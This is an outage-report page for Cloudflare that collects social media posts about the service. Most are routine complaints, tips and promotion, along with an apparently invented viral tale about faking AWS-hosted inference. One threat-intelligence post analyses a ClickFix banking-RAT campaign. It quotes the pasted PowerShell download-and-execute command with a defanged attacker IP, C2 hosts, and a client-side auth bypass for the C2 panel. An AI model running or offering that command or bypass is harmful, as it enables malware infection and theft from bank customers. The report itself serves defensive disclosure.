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Most Reported Problems
The following are the most recent problems reported by Cloudflare users through our website.
- Domains (34%)
- Cloud Services (32%)
- Hosting (18%)
- Web Tools (11%)
- E-mail (5%)
Live Outage Map
The most recent Cloudflare outage reports came from the following cities:
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Cloudflare Issues Reports
Latest outage, problems and issue reports in social media:
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Flandermaxx (@Flandermaxx) reportedA 28 year old Chinese engineer in Singapore bills 11 SaaS startups $63,400 a month for inference they think is running on AWS H100s. Forty NVIDIA Jetson Orin Nano boards stacked inside three IKEA boxes on the floor. A used Quest 3 on the bed. A half empty can of Yeo's chrysanthemum tea on the windowsill, still cold. The whole farm draws less power than his electric kettle. Each Jetson runs Llama 3.3 70B through MLC LLM, quantized to 4 bit. Each one serves embeddings, classification, and draft outputs at $0.40 per million tokens. OpenAI charges $0.60 for the same. A Cloudflare worker rewrites the response headers to read like an AWS us-east-1 region. The startups never check. They never asked. pause at 0:22, the camera holds on the IKEA boxes for two seconds. Everyone saw moving boxes. Almost nobody saw the holes drilled in the back. They were not for shelf pegs. They were the GPU intake. $63,400 in. $0 OpenAI bill. Hardware paid for itself in 11 weeks. His dad still thinks he is studying for the GMAT. He still calls home every Sunday at 8 p.m. He still says he has not picked a school. He still wears the same Uniqlo hoodie in every video call. He still has not mentioned the Stripe dashboard. A data center has racks, cooling, redundancy. He has three IKEA boxes, a kettle, forty boards humming quieter than the AC.
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Lachlan (@lynx769) reported@EddCoates Are you using Cloudflare in front of it? It should help.
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Zunaira Ai (@ZunairaAi) reported6. Default DNS Resolution Lag What it does: When your TV tries to load the image thumbnails for an app like Netflix, it uses your Internet Service Provider's default DNS server to find out where those images live on the internet. Think of DNS as the internet's phone book. Why it kills performance: ISP phone books are notoriously slow and incredibly outdated. Often, your TV is not actually lagging at all. The processor is fine, but the TV is frozen waiting for your internet provider to tell it where to download the movie poster graphics. *********** it: Settings → Network → Network Status → IP Settings → DNS Setting → Enter Manually. Change the numbers to 8.8.8.8 (Google) or 1.1.1.1 (Cloudflare). You will literally watch your streaming apps load twice as fast.
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𝐀𝐤𝐫𝐚𝐦 (@beingakramraja) reportedAkash is processing 1.7 billion tokens every single day on openrouter right now outpacing cloudflare venice, elizaos, morpheus, gensyn all paying customers running real ai workloads on akash the narrative isn't that akash could become the decentralized aws. it's that it already is for a growing list of ai companies who need cheaper compute akash just launched homenode beta people with rtx 4090s and 5090s sitting at home can now connect their gpu to the network and earn from ai inference demand this changes the supply side completely instead of relying on 58 enterprise providers, the network starts pulling in consumer hardware globally more supply means more competitive pricing which means more demand which means more akt burned the things akash is building that most ct hasn't priced in yet virtual machines launching this quarter enterprise workloads that couldn't run on containers now can starcluster acquiring 7,200 nvidia gb200 gpus protocol-owned compute at hyperscale confidential computing via tee the feature enterprises require before migrating serious workloads $akt is at $0.62 the roadmap reads like a company that's two quarters away from being unignorable
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Elshad (@elshad_ff) reported@Teknium Anyone using dashboard via Cloudflare tunnel? Have you websocket problem?
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DFIR Radar (@DFIR_Radar) reportedAI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar
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dmsimon (@dmsimon) reported@EddCoates I had the same problem and moved to @Cloudflare and am using pages and workers. Pages is free on a free account for a ridiculous amount of volume. Keep you host running the dB and move the front to CF. I also think it is much better than gh pages.
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dr.dimitru (@smart_egg) reportedIf you use CloudFlare — what feature you use the most? What do you like or don’t like about their service?
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IJav (@javmung) reported@MSU_NW_FANG @MaplestoryU @nexpacetime Also need to test WARP From CLoudflare.. that helps a lot. But most likely is his/her ISP. mine was disconencting a lot, they did reset my NAT, and assigned me a public IP address, and problems are gone.. so routing probably the problem.
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Deborah (@DeborahHat96840) reported**It's a red flag for self-dealing and questionable valuation in a no-revenue microcap.** In standard U.S. GAAP (especially for OTC companies under Alternative Reporting), a parent like **Hop-on Inc. ($HPNN)** can record an "Investment in Subsidiary" (here, ~$6.5M–$6.7M in Digitalage) on its balance sheet. For a *wholly-owned* subsidiary, full consolidation is typically required under ASC 810—line-by-line assets, liabilities, revenues, and expenses of the sub flow into the parent's statements (with eliminations for intercompany items). Treating it as a non-consolidated "investment" (often at cost or equity method) while claiming it as a subsidiary raises issues: - **Funding source via officer accruals**: Critics (and forum analyses of the Q1 2026 filing) note the asset largely stems from converted unpaid officer compensation/ obligations (primarily to CEO Peter Michaels) rather than cash infusions, external equity/debt, or operations. No cash changed hands for the bulk of the valuation. This creates a circular, related-party dynamic: the same person approves salary accruals, converts them into equity/value in a private entity he controls, and books it as a major asset for the public shell. - **Valuation support**: With HPNN showing $1,187 cash, $0 revenue, ongoing net losses (~$172k in Q1 alone), and a massive accumulated deficit (~$32.8M), there's no independent appraisal, arm's-length investment, or revenue/traction evidence disclosed to back a $6.5M+ carrying value. Digitalage itself has no separate audited financials visible in public disclosures and operates on minimal infrastructure (e.g., Cloudflare free tier per skeptics). - **Disclosure and governance gaps**: Related-party transactions (loans, accruals, conversions) must be disclosed in detail under OTC/SEC rules. Undisclosed or opaque funding for operations (while paying ~$82.5k in officer comp in Q1) can constitute material omissions. The company's governance portal and filings emphasize Digitalage as wholly-owned, yet keep it non-consolidated to avoid exposing internals. This pattern—accruing high officer pay in a dormant shell, converting to "investment" equity in a private vehicle, and promoting the sub aggressively—is common in long-deficit OTC stories. It lets the officer extract value/liability relief while public shareholders bear dilution risk, judgment exposure (e.g., recent Woolen case not fully reflected), and zero operational upside if consolidation never materializes meaningfully. **Bottom line**: It's "well" within the realm of aggressive OTC accounting that prioritizes narrative over verifiable economics. Investors should demand full consolidation details, independent valuation, and related-party footnotes in future filings. High risk of overstatement; DYOR and treat as speculative. NFA. Grok 4:53 a.m. CT 20260616
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Turac (@TuracTheThinker) reportedDeploy plane decoupled: Arcane GitOps, HA GitOps, Cloudflare Pages. Agent never touches what it changes.
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simulx4 (@simulx4) reportedcloudflare is using Kimi K2.6 to automatically resolve billing issues. and... it worked fine. it fixed my problem faster than any human. by chat/email... so much better than talking to a person, honestly
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Gilgamesh (@CaseCold56389) reportedThe network is owned by its contributors. Not by a corporation. You already know centralized infrastructure: • AWS owns the servers your apps run on • Google owns the data centers training AI models • Cloudflare owns the network protecting your traffic
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Renan Ferreira (@relferreira) reported@QuinnyPig @Cloudflare Sad that you need a huge X account to get things fixed. I have multiple support tickets open with them, and I haven't received a response for weeks
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پارسوا (@imparsua) reported@DougMadory I think the udp whitelist has been set up on this network and is limited to a number of large global resolvers such as Google, Cloudflare and etc ...
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Tobias Glöckler (@TobiasGloeckler) reported@dok2001 @QuinnyPig KeepassXC refuses to auto fill on cloudflare using the chrome extension for some reason. Anyone else has this issue?
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Jasper Disney (@jasper_disney) reportedAs an unsuccessful app builder, I only need to pay 5 dollars to Cloudflare each month. Life is not that bad.
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JD'oh (@JDoh2983) reportedWhy Crest Fundgrove and this setup are fake Classic 'fake' pattern: "AI trading bot" with impossible claims (e.g., 85%+ accuracy, easy passive profits, minimal effort). Real markets don't work this way consistently. Minimum deposit around $250 (common in these scams). They often show fake profits in your "account" to encourage more deposits, then make withdrawals difficult or impossible (claiming fees, taxes, or needing more money to "unlock"). No real regulation: Reviews couldn't verify proper licensing with Canadian regulators (IIROC/CSA). Legitimate platforms targeting Canadians are transparent about this. Fake testimonials and reviews: Their own site has glowing "verified" reviews with inconsistent numbers. YouTube "reviews" are mostly affiliate promo videos (they earn commissions on deposits/signups). Related 'fake' service reports: Similar names (e.g., Crest Maverick Broker) have Reddit complaints about fake profits followed by withdrawal blocks or demands for more money. The weird domain + tracking params: Legitimate financial companies do not use domains like "hetouchesitdies dot com" or heavy affiliate cloaking like this. This is infrastructure for running mass scam ads. The Cloudflare content you may have seen on the page is likely because these 'fake' operations often use Cloudflare for hosting/CDN/protection (or content cloaking). It doesn't make it legitimate.
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Nes|🍉 (@perwian) reported@nateskeep Not surprising ,most Spanish clubs use ai a lot ,which is really hypocritical cause then they block **** *** cloudflare so people cannot pirate football
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Pushkar Mishra (@Pushkarm029) reportedJust install Cloudflare WARP. No login. One click solution. No ads.
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firtoz (@firtoz) reported@EddCoates Would/does Cloudflare help?
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Inu Games (@games_inu) reported@EddCoates @mishuba All those people saying "use Cloudflare" cannot just check the ip and see that it is Cloudflare, unbelievable! Btw, what I do now is to block cloud providers by AS number, seems to help a little.
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Ann the cat herder (@ann1knit) reportedIf cloudflare is so buggy and easily broken or hacked, why the frell hasn't someone come up with a better system or solution?
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JustAnotherUser_4 (@JAU_4) reported@EddCoates Cloudflare firewall, thank me later. I blocked entire countries. Solved so many problems.
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Vatsal Mishra (@cryptikcell) reportedDead Internet Theory is aging annoyingly well. Cloudflare says agentic AI bots now generate 57.4% of global web requests, compared to 42.6% from humans. But “bot” is too broad. Some bots crawl, index and monitor the web. Others spam, impersonate and poison the data loop. The problem is provenance. The future internet needs to answer one boring question really well: who or what created this?
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Corey Quinn (@QuinnyPig) reportedMan, at this rate I’m gonna have to do a whole new thread with more issues for @Cloudflare to fix.
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Ahmed Aldeab (@0xfa7b) reportedStopping the bad guys with Cloudflare: 885 malicious requests blocked or challenged in the last month #cloudflare
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Rohit Kashyap | AI + Full-Stack (@rohit_jsfreaky) reported@EddCoates that nginx 500 is the scrapers basically ddosing you for free training data. robots txt is a polite suggestion they ignore now. what actually helps, put cloudflare in front with bot fight mode on, rate limit per asn not per ip since they rotate addresses, and consider a tarpit for the worst offenders. it is not legal so much as unenforceable at their scale, which is the real problem
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Caleb Sylvest (@calebsylvest) reported@jasondoesstuff Skip the CMS. Recently did the same. Used Claude to build everything Used Astro. Deployed to Cloudflare. Writing with MDX. Pre-rendered everything and served from Cloudflare edge network. Basically a fast as possible.
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Derek Martin 🇨🇦 (@lo_fye) reported@yashmp2004 Your cache busting and/or expiration is broken. Cloudflare is down. Your hosting’s network connection is shoddy, or oversaturated. A backup or clone process is hammering the disk. There’s a race condition that wasn’t triggered until now. When in doubt, check replication status.